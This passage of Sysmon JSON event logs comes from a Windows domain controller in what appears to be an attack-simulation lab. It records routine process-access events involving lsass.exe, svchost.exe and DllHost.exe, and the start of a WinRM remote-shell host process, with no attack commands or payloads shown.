C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.265\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nTargetProcessId: 2688\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.265","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.672\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00104F4E0400}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.672","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00104F4E0400}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.672\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00104F4E0400}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.672","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00104F4E0400}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00104F4E0400}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\system32\\DllHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00104F4E0400}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\system32\\DllHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2400,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.718\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.718","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.741\r\nProcessGuid: {A837DB8D-01DD-5F25-0000-001018530400}\r\nProcessId: 3384\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01D3-5F25-0000-0020A33A0400}\r\nLogonId: 0x43AA3\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: 